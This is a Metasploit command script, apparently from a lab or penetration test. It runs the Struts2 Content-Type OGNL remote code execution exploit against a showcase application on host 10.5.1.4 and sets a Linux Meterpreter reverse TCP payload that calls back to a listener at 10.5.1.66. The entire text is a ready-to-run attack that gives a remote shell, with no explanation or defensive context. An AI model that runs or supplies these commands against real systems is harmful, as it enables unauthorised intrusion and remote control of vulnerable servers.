use exploit/multi/http/struts2_content_type_ognl
set TARGETURI /struts2_2.3.15.1-showcase/showcase.action
set RHOST 10.5.1.4
set RPORT 80
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.5.1.66
exploit
